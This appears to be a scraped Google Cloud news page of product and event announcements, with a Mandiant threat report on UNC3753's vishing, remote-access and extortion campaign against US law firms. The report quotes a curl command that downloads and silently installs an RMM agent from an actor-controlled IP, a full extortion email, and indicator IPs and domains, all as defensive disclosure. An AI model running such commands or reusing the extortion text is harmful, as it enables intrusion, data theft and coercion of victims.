Master the orchestration of next-gen AI and digital ecosystems. Join Google Cloud experts and DACH tech leaders on July 6 for an exclusive look at the Apigee roadmap, Agent Management, and Model Context Protocol (MCP). Gain real-world insights and connect with the regional integration community.

Register now
Securing AI Agents: The Extended Agent Gateway Pattern
Learn how to prevent autonomous AI agents from invoking unauthorized APIs. Join Apigee Specialist Joel Gauci on June 4 for a technical deep dive into the Extended Agent Gateway pattern. This session covers enforcing Fine-Grained Authorization (FGA), implementing secure token exchange, and establishing Model Context Protocol (MCP) governance at the API gateway layer to protect enterprise backend services.

Register for the June 4 Community TechTalk
API-to-Agent Security: Exposing REST APIs to Gemini Enterprise via MCP
Connect Gemini Enterprise agents to core data without creating security hazards. Join Google Cloud Specialist Nigel Walters on June 11 to learn how to instantly transform legacy REST APIs into secure Model Context Protocol (MCP) servers. We’ll cover how to safely register tools with Gemini while enforcing gateway-level guardrails like rate limiting and access control policies.

Register for the June 11 Community TechTalk

May 18 - May 22

Chinese Webinar | June 4: AI Command and Control
As AI agents move from experimental pilots to core enterprise functions, governance has become a critical next step. Join Google Cloud on June 4th at 10:00 AM (Beijing Time) to learn how to build a secure AI management layer architecture. We'll explore how to develop governed MCP (Model Context Protocol) endpoints, manage tool access to enterprise data, and leverage robust audit logs to operationalize AI. This session also includes a practical demonstration of these governance frameworks on Google Cloud.

Register here
GCP Announces New Features to Benchmark and Optimize LLMs for On-Device Use Cases
Deploying fine-tuned LLMs from GCP to edge devices like smartphones is complex due to fragmented hardware. Google AI Edge Portal bridges this gap, giving GCP developers the ability to test AI performance on 120+ Android devices, representing the full diversity of high, medium, and low tier smartphones on the market today. This week at I/O, we announced brand new capabilities to benchmark and debug LLM performance across these devices. Sign-up to utilize these new features in private preview today.

May 11 - May 15

Build Your AI & MCP Control Tower for Universal Governance
Master the future of agentic security with Apigee. Join our Community TechTalk on May 21 to discover how Apigee serves as a central "Control Tower" for the Model Context Protocol (MCP). We will explore how new JSON-RPC tool authorization enables fine-grained access policies across your organization, ensuring secure and scalable AI deployments. Whether managing internal tools or external users, learn to govern your agentic ecosystem with absolute precision. This session is designed for global coverage across EMEA and AMER regions.

Register for the May 21 Community TechTalk

Apr 27 - May 1

Master Your Launch: The Apigee Production Go-Live Checklist
Ensure a secure launch with the Apigee production guide. Join Nicola Cardace on May 28 to explore security guardrails, including IAM roles, mTLS configurations, and encrypted KVM migrations. Scheduled at 11 AM EDT / 5 PM CEST to support EMEA and AMER teams, this TechTalk provides the technical roadmap you need to flip the switch with absolute confidence.

Register for the May 28 Community TechTalk
Transforming APIs into Governed Agentic Tools on the Google Cloud Agentic Platform
Turn your APIs into secure, governed agentic tools on the Google Cloud Agentic Platform. Join Specialist Christophe Lalevée on May 7 for a technical deep dive into AI productization. Scheduled at 5 PM CEST / 11 AM EDT to maximize coverage for developers across EMEA and AMER, this session explores the integration and governance frameworks required to scale enterprise-ready AI with confidence.

Register for the May 7 Community TechTalk
Fractional G4 VMs are Generaly Available, providing a highly efficient and cost-effective entry point for AI and graphics workloads. These new configurations, using NVIDIA virtual GPU (vGPU) technology, allow you to leverage the power of the NVIDIA RTX PRO 6000 Blackwell Server Edition GPUs in flexible, smaller increments, so you can right-size your infrastructure to match the specific demands of your applications. By providing more granular access to advanced hardware, fractional G4 VMs let you optimize resource allocation and reduce overhead without sacrificing performance. You can now select from additional GPU slice sizes for your specific needs:
- 1/2 GPU: Ideal for more intensive tasks such as LLM inference, robotics sensor simulation, and high-fidelity 3D rendering.
- 1/4 GPU: Optimized for mainstream workloads, including mid-range creative design, video transcoding, and real-time data visualization.
- 1/8 GPU: Great for lightweight applications such as remote desktops, productivity tools, and entry-level streaming services.
Transitioning AI from a sandbox prototype to an enterprise-grade system is a major hurdle. A monolithic script won't suffice for widespread deployment. To achieve true scale and reliability with Gemini, organizations must adopt service-oriented micro-agent architectures, establish Zero-Trust security, and implement rigorous EvalOps. Master the "Agentic Maturity Ladder" to ensure your AI & Agentic solutions are robust, secure, and ready for the real world.

Watch the deep dive and read the developer blog to learn more.
ML Development in VS Code with Google Cloud Power: Workbench Extension Now Available
Data scientists and developers can now combine the local productivity of VS Code with the scalable infrastructure of Google Cloud. The new Google Cloud Workbench Notebooks extension allows you to connect to and run notebooks on managed cloud environments directly within your local IDE. This integration streamlines the ML lifecycle by eliminating context switching and providing high-performance compute for complex workloads in a familiar interface. As part of our commitment to the developer ecosystem, the extension is fully open-sourced to support community-driven innovation.
- Install from Marketplace: GoogleCloudTools.workbench-notebooks
- Contribute on GitHub: colab-enterprise-vscode

Apr 20 - Apr 24

Announcing the 2026 Google Cloud Partners of the Year
Google Cloud is honored to celebrate the winners of the 2026 Partner of the Year awards! These awards recognize an exceptional group of partners across AI, Security, Infrastructure, and more, who have demonstrated a commitment to customer success. From global system integrators to specialized startups, these winners are leveraging the power of Google Cloud to solve complex challenges and drive digital transformation worldwide. Join us in congratulating these organizations for their innovation, collaboration, and impactful results over the past year.

See the 2026 Partner Award winners

Apr 13 - Apr 17

We're excited to announce the Public Preview of Datastream’s metadata integration with Knowledge Catalog. This is the first step in our vision to provide a centralized, "single pane of glass" for all Datastream assets. The enhancement automatically synchronizes Streams, Connection Profiles, and Private Connections, eliminating data silos. It enhances discoverability, allowing you to search for Datastream assets using the same interface as BigQuery tables. Centralized governance is also provided, making your real-time data estate more transparent and easier to manage.
Upgrading Apigee OPDK to 4.53 with OS Modernization
Modernize your infrastructure using Google’s official, sequential upgrade path. Our Technical expert, Rakesh Talanki outlines how to upgrade Apigee OPDK to v4.53 while migrating to a supported OS (RHEL 8.x/9.x). This guide covers the "build-out" methodology, including multi-data center syncing, to ensure a stable, zero-downtime transition

Read the guide
Cloud Run Worker Pools and CREMA: Powering Serverless AI at Scale
Google Cloud has announced the General Availability of Cloud Run worker pools, a new resource type designed specifically for pull-based, non-HTTP workloads. Unlike traditional Cloud Run services that scale based on request traffic, worker pools provide an "always-on" environment for background tasks like processing message queues or running large-scale AI inference. To support this, Google Cloud also open-sourced the Cloud Run External Metrics Autoscaler (CREMA). Built on KEDA, CREMA enables queue-aware autoscaling for worker pools, allowing them to dynamically scale based on external signals like Pub/Sub backlog or Kafka lag.
Apigee Model Context Protocol (MCP) now Generally Available
Expose enterprise APIs as MCP tools for agentic AI applications with the General Availability of MCP in Apigee. This update allows developers to transform APIs into AI-ready tools using OpenAPI Specifications, removing the need for local MCP servers or additional infrastructure. With managed endpoints and semantic search in API hub, you can now provide AI agents with secure, governed access to enterprise data at scale.

Explore the MCP overview

Apr 6 - Apr 10

Community TechTalk: Powering Retail Agents with ADK, UCP & Apigee X
Move beyond basic chatbots to secure, transactional AI experiences. Join our Community TechTalk on April 16 to learn how Apigee X and Gemini build a "Trust Layer" for AI shopping assistants using UCP standards. We’ll demonstrate how to block prompt injections with Model Armor and implement cost governance via token limits to secure the path from discovery to purchase.

Register for the TechTalk
Implement multimodal capabilities in your AI agents
Explore three new reference architectures for building sophisticated multi-agent AI systems that can process and analyze multimodal data. To analyze disparate multimodal data and produce a high-confidence classification, see Classify multimodal data. To create a fluid conversational AI that processes audio and video streams in real time, see Enable live bidirectional multimodal streaming. To consolidate fragmented multimodal data into a searchable knowledge graph, see Multimodal GraphRAG resource orchestration.
Automate SecOps workflows with an agentic AI system
To accelerate incident response and reduce manual toil for your security team, you need a system that can automate remediation playbooks. Our new reference architecture helps you build an AI agent that orchestrates complex triage and investigation workflows across disparate security tools, such as SIEM, CSPM, and EDR, from a single interface. See the full guide to orchestrate security operations workflows.

Mar 30 - Apr 3

ASEAN Webinar | April 30: Mastering Agentic Governance at Scale with GCP
As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud experts Shilpi Puri & Wely Lau for a webinar on April 30th at 11:00 AM SGT to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.

RSVP here.

Mar 23 - Mar 27

Turn your API sprawl into an agent-ready catalog
As organizations scale, APIs often become scattered across multiple gateways, creating "blind spots" that hinder AI adoption. To solve this, we’ve introduced two new capabilities for Apigee API hub: a new integration with API Gateway to automatically centralize API metadata into a single control plane, and a specification boost add-on (now in public preview). This add-on uses AI to enhance your API documentation with the precise examples and error codes that AI agents need to function reliably.

Read the full blog post to get started.
Webinar | April 16: AI Command & Control
As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud expert Satyam Maloo for a webinar on April 16th at 11:00 AM IST to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.

RSVP here.
Modernizing and Decoupling Event Ingestion with Apigee
In modern cloud-native architectures, decoupling producers from consumers is critical for building resilient systems. While Google Cloud Pub/Sub provides a scalable backbone, exposing it directly to external clients can introduce security and management overhead. This new guide explores how to leverage Apigee as an intelligent HTTP ingestion point. Learn how to handle security, mediation, and traffic control before messages reach your internal bus using the PublishMessage policy or Pub/Sub API.

Read the full guide.

Mar 16 - Mar 20

Gemini-powered Assistant in BigQuery Studio Gets Context-Aware Upgrades
The Gemini-powered assistant in BigQuery Studio has been transformed into a fully context-aware analytics partner, supporting your entire data lifecycle. The new capabilities include intelligent resource discovery, which uses Dataplex Universal Catalog search to find resources across projects and deep dive into metadata using natural language. You can now automate tasks, such as scheduling production-grade queries directly through the chat interface, and instantly troubleshoot long-running or failed jobs with root cause analysis and cost control auditing.

Explore the full range of what the assistant can do.

Mar 9 - Mar 13

Want to use Gemini to develop code and don't know where to start?
This article includes a couple of examples of developing code with Gemini prompts; it identified changes that were needed to be made to get the code working. The article also refers to other examples that are available on github.

Mar 2 - Mar 6

Introducing Gemini 3.1 Flash-Lite, our fastest and most cost-efficient Gemini 3 series model. Built for high-volume developer workloads at scale, 3.1 Flash-Lite delivers high quality for its price and model tier. Gemini 3.1 Flash-Lite can tackle tasks at scale, like high-volume translation and content moderation, where cost is a priority. And it can also handle more complex workloads where more in-depth reasoning is needed, like generating user interfaces and dashboards, creating simulations or following instructions.

Starting today, 3.1 Flash-Lite is rolling out in preview to enterprises via Vertex AI and developers via the Gemini API in Google AI Studio.
TechTalk: Implementing Device Authorization Grant (RFC 8628) for Apigee
Learn how to authorize "headless" devices like Smart TVs or AI agents that lack keyboards and browsers. Join our Community TechTalk on March 19 (5PM CET / 12PM EDT) to go under the hood of Apigee X/Hybrid. We’ll cover the real-world mechanics of state management, polling, and human-in-the-loop security patterns for devices and autonomous agents.

Register for the TechTalk

Feb 23 - Feb 27

Pro-level image generation gets faster and more accessible with Nano Banana 2
Nano Banana 2 is our state-of-the-art image generation and editing model. It delivers Pro-level image generation and editing at the speed you expect from Flash — making the quality, reasoning, and world knowledge you loved about Nano Banana Pro more accessible. Learn more about the model here.

The Intelligent Path to Compliance: Transforming Regulatory QC with Google Cloud
Reducing "Refuse to File" (RTF) risks and submission cycle times is critical for life sciences leaders. Google Cloud’s Regulatory Submission Semantic QC Auditor leverages Gemini and RAG architecture to transform Quality Control from a manual burden into an active, intelligent workflow.

By automating semantic cross-referencing, narrative coherence checks, and dynamic guidance-based auditing, this solution ensures rigorous accuracy and auditability. Operating within a secure GxP-ready environment, it empowers teams to detect subtle inconsistencies and generate remediation plans without sacrificing data privacy.

Learn more.
Stop typing, start interacting! The Gemini Live Agent Challenge is here. Build immersive agents that can help you see, hear, and speak using Gemini and Google Cloud. Compete for your share of $80,000+ in prizes and a trip to Google Cloud Next '26!

Submissions are open from February 16, 2026 to March 16, 2026. Learn more and register at geminiliveagentchallenge.devpost.com

Feb 9 - Feb 13

Introducing Gemini 3.1 Pro on Google Cloud.
3.1 Pro is a noticeably smarter, more capable baseline for complex problem-solving. We’re shipping 3.1 Pro at scale, building upon our goal to help you transform your business for the agentic future. Learn more about the model’s capabilities here. Gemini 3.1 Pro is available starting today in preview in Vertex AI and Gemini Enterprise. Developers can access the model in preview via the Gemini API in Google AI Studio, Android Studio, Google Antigravity, and Gemini CLI.
Automate Storage Compatibility with GKE Dynamic Default Storage Classes
Managing storage across mixed-generation VM clusters in GKE just got easier. With the new Dynamic Default Storage Class, Google Kubernetes Engine automatically selects between Persistent Disk (PD) and Hyperdisk based on a node's specific hardware compatibility. This abstraction eliminates the need for complex scheduling rules and manual pairing, ensuring your volumes "just work" regardless of the underlying infrastructure. By defining both variants in a single class, you reduce operational overhead while maintaining peak performance and cost-efficiency across your entire cluster.

Explore automated disk type selection
Community TechTalk: AI-Powered Apigee Development with strofa.io
Join the Apigee community on February 26 for a deep dive into strofa.io. Guest speaker Denis Kalitviansky will demonstrate how this new AI-powered tool automates and orchestrates Apigee development, from local emulators to large-scale hybrid environments. Discover how to scale your API management and streamline team collaboration using the latest in AI-driven automation.

Register now to reserve your spot.

Jan 26 - Jan 30

Simplify API Governance with Native OpenAPI v3 Support
Eliminate integration debt and accelerate deployment velocity with the General Availability of OpenAPI v3 (OASv3) support for API Gateway and Cloud Endpoints. You no longer need to downgrade modern specifications to OASv2. Instead, you can now define API contracts and enforce critical policies—including telemetry, quotas, and security—using native Google-specific extensions directly within your OASv3 files. This update ensures your APIs are secure by design while remaining fully compatible with the modern developer ecosystem and Google Cloud’s AI services.

Get started with OpenAPI v3 on API Gateway and Cloud Endpoints.

Accelerate API Testing with the New Open Source API Tester
Start validating your APIs with API Tester, a simple, YAML-based Test Driven Development (TDD) framework. Designed for the Apigee community, this tool allows you to write human-readable tests, run them instantly via a web client or CLI, and perform deep unit testing on Apigee proxies. With native support for JSONPath assertions and Apigee shared flows, you can verify everything from payload data to internal variables like proxy.basepath without leaving your terminal.

Explore the API Tester guide and start testing your proxies today.
Secure Sensitive Data with Kubernetes Secrets in Apigee hybrid
Enhance security in Apigee hybrid by accessing Kubernetes Secrets directly within your API proxies. This hybrid-exclusive feature keeps sensitive credentials within your cluster boundary and prevents replication to the management plane. It supports strict separation of duties: operators manage secrets via kubectl, while developers reference them as secure flow variables—ideal for high-compliance and GitOps workflows.

Implement Kubernetes Secrets in your hybrid proxies.
See the Console in a Whole New Light: Dark Mode is Now Generally Available in Google Cloud
Elevate your cloud management workflow with Dark Mode, now generally available in the Google Cloud console. We have delivered a modern, cohesive, and accessible experience reimagined for maximum comfort and productivity—especially during extended working hours and low-light environments. Dark Mode can be enabled automatically based on your operating system's preference, or manually through the Settings -> Appearance menu.

Switch to Dark Mode today to enjoy a modern, comfortable, and productive environment!
Apigee X Networking: PSC or VPC Peering?
Deciding how to connect Apigee X? Watch this video to compare Private Service Connect and VPC Peering. We break down northbound and southbound routing, IP consumption, and how to reach targets on-prem or in the cloud. Learn to simplify your architecture and avoid common networking "gotchas" for a smoother deployment.

Watch the video.

Jan 19 - Jan 23

Bridge the Gap: Excel-to-API Conversion in Apigee Portals
Give your customers more ways to connect! This new article by Tyler Ayers explores how to extend the Apigee Integrated Portal to support direct Excel file uploads. By leveraging SheetJS and custom portal scripts, you can enable users to upload spreadsheets, preview data, and submit it directly to your APIs, all without writing a single line of integration code themselves. It’s a powerful way to simplify onboarding for those who aren't yet API-ready.

Learn how to build it.
Elevate your applications with Firestore’s new advanced query engine
We have fundamentally reimagined Firestore with pipeline operations for Enterprise edition. Experience a powerful new engine featuring over a hundred new query features, index-less queries, new index types, and observability tooling to improve query performance. Seamlessly migrate using built-in tools and leverage Firestore’s existing differentiated serverless foundation, virtually unlimited scale, and industry-leading SLA. Join a community of 600K developers to craft expressive applications that maximize the benefits of rich queryability, real-time listen queries, robust offline caching, and cutting-edge AI-assistive coding integrations.

Learn more about Firestore pipeline operations.

Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms

Fri, 05 Jun 2026 14:00:00 +0000

Written by: Chad Reams, Tufail Ahmed, Keith Knapp, Ashley Frazer, Tyler McLellan

Introduction

From January through May 2026, Mandiant identified a financially motivated data theft extortion campaign executed by the threat cluster UNC3753 (also tracked as "Luna Moth," “Chatty Spider,” and "Silent Ransom Group") targeting dozens of organizations across professional, legal, and financial services in the United States.

UNC3753 leverages voice phishing (vishing) and social engineering deception techniques to achieve remote access into corporate environments. Using pretexts such as data migration or invoice related emails, the threat actors initiate phone conversations posing as IT support and convince targets to host screen-sharing sessions and download remote monitoring and management (RMM) utilities. Once inside the environment, the threat actors either directly conduct searches to locate and exfiltrate highly sensitive data, or manipulate the victim into executing these actions on their behalf. This data typically includes proprietary legal agreements, personally identifiable information (PII), and financial records for subsequent extortion demands.

Notably, in instances possibly linked to UNC3753, threat actors have accessed victims' systems in person. In these physical incidents, individuals posing as IT technicians entered corporate offices to attempt direct exfiltration of data from an endpoint using USB storage media.

This blog post details the threat group's technical lifecycle across recent Mandiant Consulting incident response engagements, highlights tactics like physical office targeting, and provides actionable recommendations to safeguard endpoints and infrastructure.

Threat Detail

The UNC3753 campaign lifecycle reflects an optimized, fast-tempo operational model. In many Mandiant investigated incidents, the entire attack sequence—from initial target contact to data theft and extortion—occurred within a single business day. Recently, Mandiant observed data searches, staging, and theft initiated in under an hour.

The threat group frequently initializes campaigns using benign, invoice-themed email lures sent from actor-controlled consumer email accounts. These messages contain no active links or malicious attachments. Instead, they typically contain a brief, generic message for example: “hello, here is the invcoie we talked about yesterday”. Google Threat Intelligence Group (GTIG) assesses that the primary purpose of these emails is to establish a pretext, raising the target's internal security concerns so they are more susceptible to follow-up voice calls.

Figure 1: UNC3753 attack lifecycle

Initial Access via IT Helpdesk Impersonation

The core of UNC3753's entry mechanism relies on targeted vishing. Mandiant has observed the group targeting personnel across all seniority levels, who are often publicly listed on the organization’s websites, to harvest phone numbers and email addresses. Acting as members of the organization's internal IT helpdesk or security team, threat actors place direct calls to these employees.

The callers use a variety of verbal instructions to guide target behavior. Under the guise of addressing a security issue or aiding with a corporate data migration project, they build trust and direct the target to join a screen-sharing session.

Remote Screen Control and Legitimate Tool Abuse

Once the target is engaged, the threat actors bypass conventional automated boundary security and email filtering controls by instructing the user to download and execute screen-sharing applications.

Screen-Sharing Utilities

UNC3753 instructs targets to initiate remote desktop and support sessions using built-in or commercial services, including Zoom, Microsoft Terminal Services, Microsoft Teams, and Quick Assist. During a Teams-facilitated intrusion, the threat actor held five distinct calls with the same target over a three-day period.

Commercial RMM Agents

UNC3753 frequently attempts to establish more persistent access by social engineering targets into downloading AnyDesk, Bomgar, or Zoho Assist installers. In one engagement, the threat actor attempted to install a "SuperOps RMM agent" by convincing the target to download and execute a payload via a cURL command.

Message Delivery via Privnote

Threat actors consistently utilize privnote[.]com, a web-based, self-destructing text utility, to transmit installation links and commands to targets. This evasion technique ensures that copy-paste vectors leave no permanent footprint on endpoint browsers or chat logs.

Example cURL command staging string observed in UNC3753 remote sessions:

curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet

Infrastructure Pivoting and Local Staging

Intrusions have abused Bring Your Own Device (BYOD) remote environments to access internal enterprise assets. In separate Mandiant Consulting cases, UNC3753 established Zoom sessions directly on targets' personal BYOD endpoints. Using these compromised personal laptops, they accessed corporate virtual desktop infrastructure (VDI) using native client platforms, such as Windows 365 (Windows365.exe) or Citrix clients.

Once VDI environment access is secured, the threat actors pivot to corporate file systems:

System Enumeration: The threat actors map local directories, enumerate active OneDrive folders, and crawl mapped network drives.
Document Management Targeted Harvesting: Threat actors target specific legal and document storage repositories.
Keyword Search and File Staging: Threat actors use specific keyword search functions within iManage to locate highly sensitive folders containing tax logs (Forms W-2, W-9, and 1099), audit files, corporate client agreements, and Social Security numbers (SSNs). Staged results are compiled and sorted within target-accessible subdirectories, primarily inside the user's Downloads folder or native Roaming profile path.

Data Theft

UNC3753 exfiltrates the staged data using a variety of methods to bypass security controls. They frequently use portable versions of WinSCP or Rclone. In other instances, they simply log into a threat actor-controlled consumer file sharing account directly within the victim's web browser and batch upload the stolen files.

Cloud Storage Staging: Threat actors instruct targets—or directly control their screens—to drag and drop staged folders into threat actor-controlled consumer file sharing accounts. In several intrusions, the exfiltration destination included folders explicitly renamed to mimic the victim organization's branding.
FTP Utilities: When browser-based uploads are restricted by endpoint controls, threat actors download FTP and SFTP client binaries, primarily WinSCP, to exfiltrate bulk packages. In one incident, the threat group exfiltrated 1.7 gigabytes of data from a target's local OneDrive folder to a Google Drive account before pivoting to a VDI session and exfiltrating an additional 14.4 gigabytes using WinSCP. Google has taken action against this actor by disabling the Drive accounts and assets associated with this activity.
Email Forwarding: The threat actors have also had victims stage files from internal iManage repositories and instructed them to send the files to threat actor-controlled consumer email addresses from the target's mailbox.

Threat Actor Extortion Tactics

The threat cluster delivers unbranded extortion communications via email shortly after successfully stealing data, often within 30 minutes of exiting the target environment.

These highly aggressive extortion letters give organizations a three-day deadline to respond and initiate ransom negotiations. If the victim organization is unresponsive, the threat actors declare they will call and email target employees and external clients directly to alert them of the data breach. The extortion letters explicitly emphasize that the leak will compromise client trust, invite substantial regulatory fines, and suggest that external clients sue the victim organization for data mishandling. Additionally, as part of a follow-on message the group has threatened to publish all exfiltrated archives on the LEAKEDDATA data leak site (DLS).

Sample Extortion Email

Subject: [Victim Name] has lost confidential data of their clients. Very Important!

Hello,

We have to inform you that we got access to the [Victim Name] corporation's database and took a very large dataset. We have been in your network for weeks in multiple systems , aiming for proprietary and confidential files, and were able to obtain what We were looking for as well as the data of many clients. <mentions the general nature of the stolen documents>. This is not a joke or a scam.

This is a real problem that puts the existence of your firm in danger and to prove it We have attached screenshots that are confirming the possession of the files.

Reply to Our email and We will show you the complete file tree and actual files.

We are an elite group who's been in this business for a very long time, We have Our own website where We post the data and thousands of individuals follow Our work , and connections in different business social media. But, what's more important, is that We want to return your data peacefully and as soon as possible.

We will guarantee you the complete database deletion from Our servers, video evidence of us deleting the files, privacy of our communication and Our security advice with an explanation of how We got into your network and how to fix the vulnerability that We found.

In order for us to solve this problem you need to send us an email and start communicating with us. We hope to find a financial solution that will be acceptable for both parties.

In case of ignorance or no agreement, We will notify your employees, partners and customers, after which We will publish your data. You will receive claims from individuals, and legal entities for information leakage and breach of contracts, your current deals will be terminated. Journalists and others will dig into your documents, finding inconsistencies or violations in them. Your organization will lose its reputation, shares will fall in price, and your organization will be forced to close.

Let us remind you that your data can be used by many other hackers and criminals on the dark web as well as your competitors and enemies in case We leak the data.

Law enforcement will not help you, We are out of their jurisdiction, and We already took all the critical data. They will only tell you not to communicate with us and be the first ones to fine you.

As soon as you reach out, We will show you all the files that We obtained, so you can understand the seriousness of this problem and the necessity to proceed to the negotiations.

Our communication will stay 100% private before and after the agreement. We can show the proof of it as well.

All further communication can be done through this email address.

Do not waste any time as it is ticking . Text us today, so We don't have to start calling your employees tomorrow. You will have 3 days to start communicating.

Here We attached some screenshots confirming all the above. Respond to this email and We will send you the file tree.

Figure 2: UNC3753 extortion note example

Data Leak Site

Figure 3: LEAKEDDATA DLS (partially redacted; cropped)

Suspected UNC3753 Activity Involving Physical Access

While UNC3753 primarily relies on digital vectors, GTIG assesses that associated threat actors have also attempted direct data theft using physical, in person access. This escalating tactic is corroborated by a recent FBI Cyber FLASH Alert highlighting instances where Silent Ransom Group threat actors leveraged physical office access to exfiltrate corporate data via removable USB media.

According to the FBI advisory, if remote social engineering attempts fail, actors will send an individual to a victim's physical location. The onsite threat actor will claim they need to image the device or create local backups to address a security issue. Once they gain access to the endpoint, they attempt to exfiltrate corporate data directly to an external drive.

Although limited forensic evidence and the absence of a subsequent extortion attempt prevent formal attribution, GTIG assesses that these physical intrusions are likely associated with UNC3753 based on structural, timeline, and targeting overlaps.

Attribution

GTIG attributes this campaign and related social engineering operations to UNC3753 based on infrastructure overlaps, domain registrar tracking, victimology, and target staging directories. UNC3753 (aliases: "Luna Moth," “Chatty Spider,” and "Silent Ransom Group (SRG)") is a financially motivated threat cluster active since at least March 2022. UNC3753 has TTP overlaps with UNC2686, a threat cluster that conducted "Bazarcall" style campaigns dating to early 2021. UNC3753 deployed LOCKBIT.BLACK in 2022, but has since prioritized data theft extortion-only operations typically involving threats to post stolen files to the LEAKEDDATA DLS. The threat cluster relies heavily on Remote Monitoring and Management (RMM) tools, unlike UNC2686 which deployed BAZARLOADER variants as well as TRICKBOT, URSNIF, and SILENTNIGHT. Initially, UNC3753 used subscription-themed billing email lures (such as fake software renewal alerts), typically with PDF attachments containing phone numbers for actor-controlled call centers. Beginning around March 2025, the cluster shifted tactics to pose as internal corporate IT helpdesk staff.

Remediation and Hardening

To mitigate the risk of voice phishing, physical office intrusions, and unauthorized endpoint control, GTIG recommends that organizations implement the following mitigation controls:

User Education

Conduct user awareness training specifically tailored to UNC3753 tactics, techniques, and procedures.

Physical Access and Verification Policies

Implement rigid out-of-band identity verification controls for all external contractors, technical staff, and facilities visitors. Mandate the following physical controls:

Require visitors to display official credentials and photo identification.
Require front-desk staff to copy and log all physical visitor IDs before granting access.
Verify the arrival of all technicians against pre-scheduled work orders directly with the verified parent organization or helpdesk dispatcher.
Enforce a policy requiring physical technical service personnel to be escorted by a corporate supervisor at all times.

Remote Access Conditional Access Controls

Implement remote access conditional access policies to ensure only corporate owned devices can authenticate to Virtual Desktop Instance (VDI) or Virtual Private Network (VPN) devices. This facilitates increased organizational control and visibility for potential Remote Monitoring and Management usage.

Enforce Strict RMM and Screen-Sharing Software Controls

Audit corporate environments to block the installation and execution of unauthorized remote monitoring, management, and support utilities. Enforce application control policies (e.g. Windows Defender Application Control or third-party endpoint protection tools) to restrict execution of non-approved binaries. Organizations may also consider restricting interactive screen-control features within authorized virtual meeting platforms like Zoom and Teams.

Endpoint Removable Media Hardening

To neutralize physical exfiltration vectors, disable read/write capabilities for all external USB mass storage devices. Enforce Group Policy Objects (GPOs) or MDM configurations to restrict:

USB storage device installation.
Removable media access.
Optical media writes on all corporate endpoints and BYOD systems utilizing VDI entry.

Network Monitoring and Egress Control

Monitor firewall logs, network flows, and endpoint execution logs for indicative exfiltration and staging actions. Specifically:

Block or alert on outbound connections to unauthorized file-sharing APIs and emails.
Ensure full session logging with bytes transferred is enabled within Firewall log configurations.
Monitor SSH traffic (Port 22) from internal VDIs and endpoints for high-volume WinSCP and Rclone transfers.

Application Log and Access Auditing

Review authentication and access metrics for critical document stores to identify bulk harvesting profiles.

Configure real-time alerts in iManage, SharePoint, and corporate email directories for rapid file searches, search-term spikes, and mass file downloads.
Implement multi-factor authentication (MFA) on business critical data repository applications, such as iManage.
Implement strict BYOD authentication controls, requiring MFA step-up queries when accessing VDI nodes.

Outlook and Implications

The targeting of US legal and professional services organizations by financially motivated actors is a persistent industry risk. Legal services firms represent high-value targets for extortion actors. They maintain concentrated repositories of extremely sensitive client transaction files, merger and acquisition plans, client trade secrets, and corporate regulatory reports. Threat groups recognize that legal entities are subject to heavy reputational and regulatory exposure and may be highly motivated to resolve extortion situations quietly to protect their professional standing.

Threat actors recognize that targeting the human element—specifically using voice-guided social engineering—enables them to easily bypass robust technical perimeters, web security gateways, and MFA configurations.

Finally, the integration of in-person, physical intrusions represents an escalation in threat capability. While log-based defenses and endpoint telemetry have matured, physical corporate boundaries are frequently protected only by administrative procedures. Organizations must transition to a unified security posture that treats physical facility access control and endpoint-based hardware policies as equal components of their defensive perimeter.

Data Leak Site (DLS)

UNC3753 utilizes the following web platform to disclose the identities of victims and their compromised data.

hxxps[:]//business-data-leaks[.]com

Phishing Domains

GTIG identified infrastructure registrations by suspected UNC3753 actors utilizing specific naming conventions, assessed as supporting their ongoing social engineering and vishing activities.

<organization>-itdesk[.]com
<organization>-it[.]com
<organization>-helpdesk[.]com

Indicators of Compromise (IOCs)

To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a GTI Collection for registered users.

IOC Type	Indicator
IPv4 Address	192.236.147.131
IPv4 Address	192.236.147.138
IPv4 Address	193.141.60.212
IPv4 Address	192.236.154.158
IPv4 Address	192.236.146.173
IPv4 Address	174.169.162.62
IPv4 Address	64.94.84.97

Google Security Operations (SecOps)

Google SecOps customers have access to these broad category rules and more under the Mandiant Intel Emerging Threats rule pack. The activity discussed in the blog post is detected in Google SecOps under the rule names:

Execute MSI Files Downloaded via Curl
Suspected Rclone Exfiltration

MITRE ATT&CK

Tactic	Technique ID	Technique Name
Initial Access	T1566.004	Phishing: Spearphishing Voice
Initial Access	T1133	External Remote Services
Execution	T1204.002	User Execution: Malicious File
	T1059.001	Command and Scripting Interpreter: PowerShell
	T1059.003	Command and Scripting Interpreter: Windows Command Shell
	T1569.002	System Services: Service Execution
Persistence	T1053.005	Scheduled Task/Job: Scheduled Task
Persistence	T1547.001	Boot or Logon Autostart Execution: Registry Run Keys
Defense Evasion	T1036.005	Masquerading: Match Legitimate Name or Location
	T1553.002	Subvert Trust Controls: Code Signing
	T1562.001	Impair Defenses: Disable or Modify Tools
	T1070.001	Indicator Removal: Clear Windows Event Logs
Credential Access	T1003.001	OS Credential Dumping: LSASS Memory
Credential Access	T1003.002	OS Credential Dumping: Security Account Manager
Discovery	T1083	File and Directory Discovery
	T1135	Network Share Discovery
	T1046	Network Service Discovery
Lateral Movement	T1219	Remote Access Software
	T1021.001	Remote Services: Remote Desktop Protocol
	T1021.004	Remote Services: SSH
Collection	T1005	Data from Local System
Command & Control	T1572	Protocol Tunneling
Exfiltration	T1020	Automated Exfiltration
	T1567.002	Exfiltration Over Web Service: Exfiltration to Cloud Storage
	T1052.001	Exfiltration Over Physical Medium
Impact	T1486	Data Encrypted for Impact

What's new for Managed Service for Apache Spark clusters

Thu, 04 Jun 2026 16:00:00 +0000

At Google Cloud, our goal is to let you run large-scale analytical and data science workloads with maximum efficiency so you can process big data pipelines, machine learning, and ETL tasks.

We recently announced that the Dataproc service is now Managed Service for Apache Spark, reflecting our deep integration with the Agentic Data Cloud.

